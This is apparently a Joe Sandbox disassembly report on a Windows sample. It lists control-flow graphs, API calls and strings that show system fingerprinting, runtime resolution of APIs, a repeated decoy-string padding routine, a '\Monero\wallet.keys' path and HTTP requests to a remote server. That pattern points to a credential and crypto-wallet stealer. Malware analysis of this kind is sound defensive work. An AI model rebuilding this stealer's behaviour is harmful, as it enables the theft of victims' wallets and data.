lstrcpy 15178->15179 15180 872021 15179->15180 15181 87a9b0 4 API calls 15180->15181 15182 872040 15181->15182 15183 87a8a0 lstrcpy 15182->15183 15184 872049 15183->15184 15185 87a9b0 4 API calls 15184->15185 15186 87206a 15185->15186 15187 87a8a0 lstrcpy 15186->15187 15188 872073 15187->15188 15189 87207e GetCurrentProcessId 15188->15189 15800 879470 OpenProcess 15189->15800 15192 87a920 3 API calls 15193 8720a4 15192->15193 15194 87a8a0 lstrcpy 15193->15194 15195 8720ad 15194->15195 15196 87a9b0 4 API calls 15195->15196 15197 8720d7 15196->15197 15198 87a8a0 lstrcpy 15197->15198 15199 8720e0 15198->15199 15200 87a9b0 4 API calls 15199->15200 15201 872100 15200->15201 15202 87a8a0 lstrcpy 15201->15202 15203 872109 15202->15203 15805 877e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15203->15805 15206 87a9b0 4 API calls 15207 872129 15206->15207 15208 87a8a0 lstrcpy 15207->15208 15209 872132 15208->15209 15210 87a9b0 4 API calls 15209->15210 15211 872151 15210->15211 15212 87a8a0 lstrcpy 15211->15212 15213 87215a 15212->15213 15214 87a9b0 4 API calls 15213->15214 15215 87217b 15214->15215 15216 87a8a0 lstrcpy 15215->15216 15217 872184 15216->15217 15809 877f60 15217->15809 15220 87a9b0 4 API calls 15221 8721a4 15220->15221 15222 87a8a0 lstrcpy 15221->15222 15223 8721ad 15222->15223 15224 87a9b0 4 API calls 15223->15224 15225 8721cc 15224->15225 15226 87a8a0 lstrcpy 15225->15226 15227 8721d5 15226->15227 15228 87a9b0 4 API calls 15227->15228 15229 8721f6 15228->15229 15230 87a8a0 lstrcpy 15229->15230 15231 8721ff 15230->15231 15822 877ed0 GetSystemInfo wsprintfA 15231->15822 15234 87a9b0 4 API calls 15235 87221f 15234->15235 15236 87a8a0 lstrcpy 15235->15236 15237 872228 15236->15237 15238 87a9b0 4 API calls 15237->15238 15239 872247 15238->15239 15240 87a8a0 lstrcpy 15239->15240 15241 872250 15240->15241 15242 87a9b0 4 API calls 15241->15242 15243 872270 15242->15243 15244 87a8a0 lstrcpy 15243->15244 15245 872279 15244->15245 15824 878100 GetProcessHeap 
RtlAllocateHeap 15245->15824 15248 87a9b0 4 API calls 15249 872299 15248->15249 15250 87a8a0 lstrcpy 15249->15250 15251 8722a2 15250->15251 15252 87a9b0 4 API calls 15251->15252 15253 8722c1 15252->15253 15254 87a8a0 lstrcpy 15253->15254 15255 8722ca 15254->15255 15256 87a9b0 4 API calls 15255->15256 15257 8722eb 15256->15257 15258 87a8a0 lstrcpy 15257->15258 15259 8722f4 15258->15259 15830 8787c0 15259->15830 15262 87a920 3 API calls 15263 87231e 15262->15263 15264 87a8a0 lstrcpy 15263->15264 15265 872327 15264->15265 15266 87a9b0 4 API calls 15265->15266 15267 872351 15266->15267 15268 87a8a0 lstrcpy 15267->15268 15269 87235a 15268->15269 15270 87a9b0 4 API calls 15269->15270 15271 87237a 15270->15271 15272 87a8a0 lstrcpy 15271->15272 15273 872383 15272->15273 15274 87a9b0 4 API calls 15273->15274 15275 8723a2 15274->15275 15276 87a8a0 lstrcpy 15275->15276 15277 8723ab 15276->15277 15835 8781f0 15277->15835 15279 8723c2 15280 87a920 3 API calls 15279->15280 15281 8723d5 15280->15281 15282 87a8a0 lstrcpy 15281->15282 15283 8723de 15282->15283 15284 87a9b0 4 API calls 15283->15284 15285 87240a 15284->15285 15286 87a8a0 lstrcpy 15285->15286 15287 872413 15286->15287 15288 87a9b0 4 API calls 15287->15288 15289 872432 15288->15289 15290 87a8a0 lstrcpy 15289->15290 15291 87243b 15290->15291 15292 87a9b0 4 API calls 15291->15292 15293 87245c 15292->15293 15294 87a8a0 lstrcpy 15293->15294 15295 872465 15294->15295 15296 87a9b0 4 API calls 15295->15296 15297 872484 15296->15297 15298 87a8a0 lstrcpy 15297->15298 15299 87248d 15298->15299 15300 87a9b0 4 API calls 15299->15300 15301 8724ae 15300->15301 15302 87a8a0 lstrcpy 15301->15302 15303 8724b7 15302->15303 15843 878320 15303->15843 15305 8724d3 15306 87a920 3 API calls 15305->15306 15307 8724e6 15306->15307 15308 87a8a0 lstrcpy 15307->15308 15309 8724ef 15308->15309 15310 87a9b0 4 API calls 15309->15310 15311 872519 15310->15311 15312 87a8a0 lstrcpy 15311->15312 15313 872522 15312->15313 15314 87a9b0 4 API calls 
15313->15314 15315 872543 15314->15315 15316 87a8a0 lstrcpy 15315->15316 15317 87254c 15316->15317 15318 878320 17 API calls 15317->15318 15319 872568 15318->15319 15320 87a920 3 API calls 15319->15320 15321 87257b 15320->15321 15322 87a8a0 lstrcpy 15321->15322 15323 872584 15322->15323 15324 87a9b0 4 API calls 15323->15324 15325 8725ae 15324->15325 15326 87a8a0 lstrcpy 15325->15326 15327 8725b7 15326->15327 15328 87a9b0 4 API calls 15327->15328 15329 8725d6 15328->15329 15330 87a8a0 lstrcpy 15329->15330 15331 8725df 15330->15331 15332 87a9b0 4 API calls 15331->15332 15333 872600 15332->15333 15334 87a8a0 lstrcpy 15333->15334 15335 872609 15334->15335 15879 878680 15335->15879 15337 872620 15338 87a920 3 API calls 15337->15338 15339 872633 15338->15339 15340 87a8a0 lstrcpy 15339->15340 15341 87263c 15340->15341 15342 87265a lstrlen 15341->15342 15343 87266a 15342->15343 15344 87a740 lstrcpy 15343->15344 15345 87267c 15344->15345 15346 861590 lstrcpy 15345->15346 15347 87268d 15346->15347 15889 875190 15347->15889 15349 872699 15349->13781 16077 87aad0 15350->16077 15352 865009 InternetOpenUrlA 15356 865021 15352->15356 15353 8650a0 InternetCloseHandle InternetCloseHandle 15355 8650ec 15353->15355 15354 86502a InternetReadFile 15354->15356 15355->13785 15356->15353 15356->15354 16078 8698d0 15357->16078 15359 870759 15360 87077d 15359->15360 15361 870a38 15359->15361 15364 870799 StrCmpCA 15360->15364 15362 861590 lstrcpy 15361->15362 15363 870a49 15362->15363 16254 870250 15363->16254 15366 870843 15364->15366 15367 8707a8 15364->15367 15370 870865 StrCmpCA 15366->15370 15369 87a7a0 lstrcpy 15367->15369 15371 8707c3 15369->15371 15372 870874 15370->15372 15409 87096b 15370->15409 15373 861590 lstrcpy 15371->15373 15375 87a740 lstrcpy 15372->15375 15374 87080c 15373->15374 15376 87a7a0 lstrcpy 15374->15376 15378 870881 15375->15378 15379 870823 15376->15379 15377 87099c StrCmpCA 15380 870a2d 15377->15380 15381 8709ab 15377->15381 15382 87a9b0 4 API calls 
15378->15382 15383 87a7a0 lstrcpy 15379->15383 15380->13789 15384 861590 lstrcpy 15381->15384 15385 8708ac 15382->15385 15386 87083e 15383->15386 15387 8709f4 15384->15387 15388 87a920 3 API calls 15385->15388 16081 86fb00 15386->16081 15391 87a7a0 lstrcpy 15387->15391 15389 8708b3 15388->15389 15392 87a9b0 4 API calls 15389->15392 15393 870a0d 15391->15393 15395 8708ba 15392->15395 15394 87a7a0 lstrcpy 15393->15394 15396 870a28 15394->15396 15397 87a8a0 lstrcpy 15395->15397 15409->15377 15729 87a7a0 lstrcpy 15728->15729 15730 861683 15729->15730 15731 87a7a0 lstrcpy 15730->15731 15732 861695 15731->15732 15733 87a7a0 lstrcpy 15732->15733 15734 8616a7 15733->15734 15735 87a7a0 lstrcpy 15734->15735 15736 8615a3 15735->15736 15736->14612 15738 8647c6 15737->15738 15739 864838 lstrlen 15738->15739 15763 87aad0 15739->15763 15741 864848 InternetCrackUrlA 15742 864867 15741->15742 15742->14689 15744 87a740 lstrcpy 15743->15744 15745 878b74 15744->15745 15746 87a740 lstrcpy 15745->15746 15747 878b82 GetSystemTime 15746->15747 15749 878b99 15747->15749 15748 87a7a0 lstrcpy 15750 878bfc 15748->15750 15749->15748 15750->14704 15752 87a931 15751->15752 15753 87a988 15752->15753 15755 87a968 lstrcpy lstrcat 15752->15755 15754 87a7a0 lstrcpy 15753->15754 15756 87a994 15754->15756 15755->15753 15756->14707 15757->14822 15759 864eee 15758->15759 15760 869af9 LocalAlloc 15758->15760 15759->14710 15759->14712 15760->15759 15761 869b14 CryptStringToBinaryA 15760->15761 15761->15759 15762 869b39 LocalFree 15761->15762 15762->15759 15763->15741 15764->14832 15765->14973 15766->14975 15767->14983 15896 8777a0 15768->15896 15771 8776c6 RegOpenKeyExA 15773 8776e7 RegQueryValueExA 15771->15773 15774 877704 RegCloseKey 15771->15774 15772 871c1e 15772->15065 15773->15774 15774->15772 15776 871c99 15775->15776 15776->15079 15778 871e09 15777->15778 15778->15121 15780 871e84 15779->15780 15781 877a9a wsprintfA 15779->15781 15780->15135 15781->15780 15783 871efe 15782->15783 15784 877b4d 
15782->15784 15783->15149 15903 878d20 LocalAlloc CharToOemW 15784->15903 15787 87a740 lstrcpy 15786->15787 15788 877bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15787->15788 15795 877c25 15788->15795 15789 877c46 GetLocaleInfoA 15789->15795 15790 877d18 15791 877d1e LocalFree 15790->15791 15792 877d28 15790->15792 15791->15792 15793 87a7a0 lstrcpy 15792->15793 15797 877d37 15793->15797 15794 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15794->15795 15795->15789 15795->15790 15795->15794 15796 87a8a0 lstrcpy 15795->15796 15796->15795 15797->15162 15799 872008 15798->15799 15799->15177 15801 8794b5 15800->15801 15802 879493 GetModuleFileNameExA CloseHandle 15800->15802 15803 87a740 lstrcpy 15801->15803 15802->15801 15804 872091 15803->15804 15804->15192 15806 872119 15805->15806 15807 877e68 RegQueryValueExA 15805->15807 15806->15206 15808 877e8e RegCloseKey 15807->15808 15808->15806 15810 877fb9 GetLogicalProcessorInformationEx 15809->15810 15811 877fd8 GetLastError 15810->15811 15814 878029 15810->15814 15819 878022 15811->15819 15821 877fe3 15811->15821 15816 8789f0 2 API calls 15814->15816 15815 8789f0 2 API calls 15817 872194 15815->15817 15818 87807b 15816->15818 15817->15220 15818->15819 15820 878084 wsprintfA 15818->15820 15819->15815 15819->15817 15820->15817 15821->15810 15821->15817 15904 8789f0 15821->15904 15907 878a10 GetProcessHeap RtlAllocateHeap 15821->15907 15823 87220f 15822->15823 15823->15234 15825 8789b0 15824->15825 15826 87814d GlobalMemoryStatusEx 15825->15826 15829 878163 __aulldiv 15826->15829 15827 87819b wsprintfA 15828 872289 15827->15828 15828->15248 15829->15827 15831 8787fb GetProcessHeap RtlAllocateHeap wsprintfA 15830->15831 15833 87a740 lstrcpy 15831->15833 15834 87230b 15833->15834 15834->15262 15836 87a740 lstrcpy 15835->15836 15842 878229 15836->15842 15837 878263 15838 87a7a0 lstrcpy 15837->15838 15840 8782dc 15838->15840 15839 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15839->15842 15840->15279 15841 87a8a0 lstrcpy 
15841->15842 15842->15837 15842->15839 15842->15841 15844 87a740 lstrcpy 15843->15844 15845 87835c RegOpenKeyExA 15844->15845 15846 8783d0 15845->15846 15847 8783ae 15845->15847 15849 878613 RegCloseKey 15846->15849 15850 8783f8 RegEnumKeyExA 15846->15850 15848 87a7a0 lstrcpy 15847->15848 15860 8783bd 15848->15860 15851 87a7a0 lstrcpy 15849->15851 15852 87843f wsprintfA RegOpenKeyExA 15850->15852 15853 87860e 15850->15853 15851->15860 15854 878485 RegCloseKey RegCloseKey 15852->15854 15855 8784c1 RegQueryValueExA 15852->15855 15853->15849 15858 87a7a0 lstrcpy 15854->15858 15856 878601 RegCloseKey 15855->15856 15857 8784fa lstrlen 15855->15857 15856->15853 15857->15856 15859 878510 15857->15859 15858->15860 15861 87a9b0 4 API calls 15859->15861 15860->15305 15862 878527 15861->15862 15863 87a8a0 lstrcpy 15862->15863 15864 878533 15863->15864 15865 87a9b0 4 API calls 15864->15865 15866 878557 15865->15866 15867 87a8a0 lstrcpy 15866->15867 15868 878563 15867->15868 15869 87856e RegQueryValueExA 15868->15869 15869->15856 15870 8785a3 15869->15870 15871 87a9b0 4 API calls 15870->15871 15872 8785ba 15871->15872 15873 87a8a0 lstrcpy 15872->15873 15874 8785c6 15873->15874 15875 87a9b0 4 API calls 15874->15875 15876 8785ea 15875->15876 15877 87a8a0 lstrcpy 15876->15877 15878 8785f6 15877->15878 15878->15856 15880 87a740 lstrcpy 15879->15880 15881 8786bc CreateToolhelp32Snapshot Process32First 15880->15881 15882 87875d CloseHandle 15881->15882 15883 8786e8 Process32Next 15881->15883 15884 87a7a0 lstrcpy 15882->15884 15883->15882 15888 8786fd 15883->15888 15885 878776 15884->15885 15885->15337 15886 87a8a0 lstrcpy 15886->15888 15887 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15887->15888 15888->15883 15888->15886 15888->15887 15890 87a7a0 lstrcpy 15889->15890 15891 8751b5 15890->15891 15892 861590 lstrcpy 15891->15892 15893 8751c6 15892->15893 15908 865100 15893->15908 15895 8751cf 15895->15349 15899 877720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15896->15899 15898 8776b9 
Control-flow graph (continuation of the edge list from the preceding function card; the rendered graph survives only as node->node pairs). The API-bearing blocks recoverable from it: 877765 RegQueryValueExA and 877780 RegCloseKey; 8789f9 GetProcessHeap/HeapFree; 87a7a0, 87a740 and 87a8a0 lstrcpy; 865192 lstrlen; 8651fd InternetOpenA and StrCmpCA; 865329 InternetConnectA; 865359 HttpOpenRequestA; 8658b7 and 8658c4 InternetCloseHandle; 878ead and 878f05 CryptBinaryToStringA around 878ece GetProcessHeap/RtlAllocateHeap; 878a10 GetProcessHeap/RtlAllocateHeap; 866a09 LoadLibraryA; 866ba8 GetProcAddress; 86668f and 866743 VirtualAlloc; 866ee6 VirtualFree; 866f26 FreeLibrary. Calls into 8647b0, 878b60, 878de0, 8789f0, 87a920 and 87a9b0 appear only as collapsed "N API calls" nodes, and 8658d9, 878ef4 and 8698ad are labelled codecvt.

                        Control-flow Graph

                        control_flow_graph 660 879860-879874 call 879750 663 879a93-879af2 LoadLibraryA * 5 660->663 664 87987a-879a8e call 879780 GetProcAddress * 21 660->664 666 879af4-879b08 GetProcAddress 663->666 667 879b0d-879b14 663->667 664->663 666->667 668 879b46-879b4d 667->668 669 879b16-879b41 GetProcAddress * 2 667->669 671 879b4f-879b63 GetProcAddress 668->671 672 879b68-879b6f 668->672 669->668 671->672 673 879b71-879b84 GetProcAddress 672->673 674 879b89-879b90 672->674 673->674 675 879b92-879bbc GetProcAddress * 2 674->675 676 879bc1-879bc2 674->676 675->676
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01161190), ref: 008798A1
                        • GetProcAddress.KERNEL32(75900000,01161298), ref: 008798BA
                        • GetProcAddress.KERNEL32(75900000,01161340), ref: 008798D2
                        • GetProcAddress.KERNEL32(75900000,011613B8), ref: 008798EA
                        • GetProcAddress.KERNEL32(75900000,011611D8), ref: 00879903
                        • GetProcAddress.KERNEL32(75900000,01169498), ref: 0087991B
                        • GetProcAddress.KERNEL32(75900000,01157368), ref: 00879933
                        • GetProcAddress.KERNEL32(75900000,01157568), ref: 0087994C
                        • GetProcAddress.KERNEL32(75900000,01161118), ref: 00879964
                        • GetProcAddress.KERNEL32(75900000,01161130), ref: 0087997C
                        • GetProcAddress.KERNEL32(75900000,011612B0), ref: 00879995
                        • GetProcAddress.KERNEL32(75900000,01161310), ref: 008799AD
                        • GetProcAddress.KERNEL32(75900000,01157588), ref: 008799C5
                        • GetProcAddress.KERNEL32(75900000,01161358), ref: 008799DE
                        • GetProcAddress.KERNEL32(75900000,01161370), ref: 008799F6
                        • GetProcAddress.KERNEL32(75900000,01157508), ref: 00879A0E
                        • GetProcAddress.KERNEL32(75900000,01161160), ref: 00879A27
                        • GetProcAddress.KERNEL32(75900000,011614A8), ref: 00879A3F
                        • GetProcAddress.KERNEL32(75900000,011575A8), ref: 00879A57
                        • GetProcAddress.KERNEL32(75900000,01161448), ref: 00879A70
                        • GetProcAddress.KERNEL32(75900000,01157348), ref: 00879A88
                        • LoadLibraryA.KERNEL32(011614C0,?,00876A00), ref: 00879A9A
                        • LoadLibraryA.KERNEL32(01161400,?,00876A00), ref: 00879AAB
                        • LoadLibraryA.KERNEL32(01161418,?,00876A00), ref: 00879ABD
                        • LoadLibraryA.KERNEL32(01161430,?,00876A00), ref: 00879ACF
                        • LoadLibraryA.KERNEL32(01161460,?,00876A00), ref: 00879AE0
                        • GetProcAddress.KERNEL32(75070000,01161478), ref: 00879B02
                        • GetProcAddress.KERNEL32(75FD0000,01161490), ref: 00879B23
                        • GetProcAddress.KERNEL32(75FD0000,01169B00), ref: 00879B3B
                        • GetProcAddress.KERNEL32(75A50000,01169B18), ref: 00879B5D
                        • GetProcAddress.KERNEL32(74E50000,011572E8), ref: 00879B7E
                        • GetProcAddress.KERNEL32(76E80000,01169488), ref: 00879B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00879BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00879BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 768e60604c164e94284c4fd93d5bbe52c4635418c4cef43f3e893915aa2557ad
                        • Instruction ID: 1e5bcc97b47987ea71b2905b462f20bc1cc0620f8582dd1ea0758b780ea74bf3
                        • Opcode Fuzzy Hash: 768e60604c164e94284c4fd93d5bbe52c4635418c4cef43f3e893915aa2557ad
                        • Instruction Fuzzy Hash: 36A13FB66002529FD395EFE8ED88A6637F9F76E301704851AE609C32E4D7399843CF52

                        Control-flow Graph

                        control_flow_graph 764 8645c0-864695 RtlAllocateHeap 781 8646a0-8646a6 764->781 782 86474f-8647a9 VirtualProtect 781->782 783 8646ac-86474a 781->783 783->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0086460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0086479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086475A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated, '$'-separated, once for every xref listed under Strings above; the verbatim repeats are omitted here)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: b26bbaff56d108c9e2f4ce6aae254cdd19082c12e142a645445375009e39a3e8
                        • Instruction ID: 657c2da8e21341862c30f15941a93b74ddf5221aaf7b669631ab27b3f9b74c82
                        • Opcode Fuzzy Hash: b26bbaff56d108c9e2f4ce6aae254cdd19082c12e142a645445375009e39a3e8
                        • Instruction Fuzzy Hash: 3E41F6607C260C6ACE24B7A4AC6EDFD7756FF63744F506054EC60B2780CBF86A894726

                        Control-flow Graph

                        control_flow_graph (the rendered graph survives only as an edge list; the recoverable structure is as follows). 864880-864942 calls 87a7a0, 8647b0 and 87a740 x5, then InternetOpenA and StrCmpCA, and continues through 864944 / 86494b-86494f either to 864955-864acd (calls to 878b60, 87a920, 87a8a0, 87a800 and 87a9b0, then InternetConnectA) or directly to 864ecb-864ef3 (InternetCloseHandle, calls 87aad0 and 869ac0). 864955-864acd likewise goes either to 864ecb-864ef3 or on through 864ad3-864ad7 and 864ad9-864ae3 / 864ae5 to 864aef-864b22 HttpOpenRequestA, which goes either to 864ebe-864ec5 (InternetCloseHandle) or to 864b28-864e28, a long run of calls to 87a9b0, 87a8a0, 87a800, 87a920, 87a740 and 87aad0 with lstrlen x2 that ends in HttpSendRequestA. 864e32-864e5c InternetReadFile goes either to 864e67-864eb9 (InternetCloseHandle, call 87a800) or to 864e5e-864e65, which in turn goes to 864e67-864eb9 or through 864e69-864ea7 (calls 87a9b0, 87a8a0, 87a800) back to 864e32, forming the read loop. 864e67-864eb9 leads to 864ebe-864ec5, then to 864ecb-864ef3, which goes either to 864ef5-864f2d (calls 87a820, 87a9b0, 87a8a0, 87a800) and on to 864f32-864fa2, or directly to 864f32-864fa2 (calls 878990 x2, 87a7a0, 87a800 x8).
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00864915
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 0086493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00864ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00880DDB,00000000,?,?,00000000,?,",00000000,?,0116ED18), ref: 00864DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00864E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00864E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00864E49
                        • InternetCloseHandle.WININET(00000000), ref: 00864EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00864EC5
                        • HttpOpenRequestA.WININET(00000000,0116EDA8,?,0116E750,00000000,00000000,00400100,00000000), ref: 00864B15
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • InternetCloseHandle.WININET(00000000), ref: 00864ECF
                        Strings
                        Memory Dump Source
